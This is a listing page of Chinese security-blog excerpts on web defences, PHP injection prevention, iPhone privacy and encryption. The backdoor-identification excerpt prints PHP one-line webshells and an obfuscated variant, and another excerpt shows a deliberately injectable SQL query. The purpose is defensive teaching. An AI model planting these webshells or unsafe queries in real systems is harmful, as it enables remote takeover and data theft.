最近的文章列表

javascript防劫持-防止网页被Frame-Content Security Policy-添加integrity属性

什么是javascript劫持

javascript劫持属于HTTP劫持中的一种,主要是劫持js文件,然后在网页中通过js脚本往网页中注入图片和链接或者框架广告,也叫流量劫持。 文明一点的劫持只是右下角放一个固定广告,不文明的就自动弹出新广告窗口(一般会被浏览器拦截)或者给整个网页添加点击事件弹出新广告页面。

javascript劫持套路

1、document.write注入

2017/1/5 Comments:
总结php防注入和XSS攻击通用过滤(带示例代码)

对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。

那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips

1. 假定所有的用户输入数据都是“邪恶”的
2. 弱类型的脚本语言必须保证类型和期望的一致
3. 考虑周全的正则表达式
4. strip_tags、htmlspecialchars 这类函数很好用 <b

2015/12/10 Comments:
如何识别简单的免查杀的PHP后门(带示例讲解)

一个最常见的一句话后门可能写作这样

<?php @eval($_POST['cmd']);?>

或这样

<?php @assert($_POST['cmd']);?>

tudouya 同学在FREEBUF上给出[一种构造技巧]利用

代码如下:

<?php  @$_++; // $_ = 1  $__=("#"^"|"); // $__ = _   $__.=("."^"~"); // _P   $__.=("/"^"`"); // _PO   $__.=("|"^"/"); // _POS   $__.=("{"^"/"); // _POST   ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  ?>
2015/12/8 Comments:
iPhone通过8招提升安全,防止泄露隐私(开启 Find My iPhone 功能、禁用常去地点、限制广告跟踪...)

进入数字信息时代之后,消费者对自身的隐私安全越来越重视,而对于 iPhone 用户来说,隐私信息并不仅限于手机本身,还需要考虑 iCloud 和 Apple ID 等方面的信息安全。今天,我们就来说一说提升 iPhone 用户隐私安全等级的 8 个小技巧,一起来看看吧。

1. 开启 Find My iPhone 功能

iPhone泄露怎么办

2015/10/17 Comments:
iCloud被盗怎么办?mischa07 木马检测清理查杀工具使用方法

  最近22万个iCloud账户被盗事件相信大家都知道了,那么怎么才能查询到自己的iCloud帐号密码是否泄漏了呢?小编下面就给大家推荐一款iCloud盗号木马查杀工具,希望可以帮助大家监测自己的帐号是否被盗。

 

iCloud被盗怎么办

 

  我们已经知道该恶意程序是主要

2015/9/10 Comments:
php跨站攻击的原理与防范技巧及token实例分析

跨站攻击就是利用程序上的一些细节或bug问题进行的,那么我们要如何耿防止跨站攻击呢?下面就以一个防止跨站攻击例子来说明,希望对各位有帮助。

代码如下:
<?php
#demo for prevent csrf
/**
* enc
*/
function encrypt($token_time) {
return md5('!@##$@$$#%43' . $token_time);
2015/5/31 Comments:
分析PHP中如何防止SQL注入及PDO的防治方法

一、问题描述:

  如果用户输入的数据在未经处理的情况下插入到一条SQL查询语句,那么应用将很可能遭受到SQL注入攻击,正如下面的例子:

代码如下:
$unsafe_variable = $_POST['user_input']; 
 
mysql_query("INSERT INTO `table` (`column`) VALUES ('" . $unsafe_variable . "')");
2015/4/20 Comments:
使用PDO杜绝SQL注入的注意事项总结和PDO防注入原理分析

我们都知道,只要合理正确使用PDO,可以基本上防止SQL注入的产生,本文主要回答以下两个问题:

为什么要使用PDO而不是mysql_connect?
为何PDO能防注入?
使用PDO防注入的时候应该特别注意什么?
 
一、为何要优先使用PDO?

PHP手册上说得很清楚:
Prepared statements and stored procedures<b

2015/4/19 Comments:
C# RSACryptoServiceProvider类实现RSA(非对称加密)算法(RSAHelper)

1.首先介绍下什么是RSA算法,让大家对RSA算法有个简要的理解.
   RSA算法非常简单,概述如下:
找两素数p和q
取n=p*q  如:n=3*7=21
取t=(p-1)*(q-1) 如:t = 2*6 = 12
   取任何一个数e,要求满足e 
取d*e%t==1  如:d=7,e=7,则7*7/12刚好等于1满足要求

2015/3/7 Comments:
接口地址加密 和 API权限设计 保护服务器上的数据安全通信传输

移动应用中,通过在客户端对访问的url进行加密处理来保护服务器上的数据

我认为,保护服务器端的数据,有这么几个关键点:

1、不能对使用体验产生影响,这就排除掉了诸如每次接口调用都要求用户输入验证码这样的做法
2、接口调用的网络交互需要无规律可循,比如article/1 –> article/1000 这样的接口就太容易被其他人爬走了
3、要严格意义上阻击爬虫,需要每一次网络请求都是不可重放的,这样才能避免其他人通过监听网络交互并重放来爬取数据
4、对服务器端编码不产生太大影响,如果要对服务器端伤筋动骨的大改,肯定是要不得的

2015/2/28 Comments: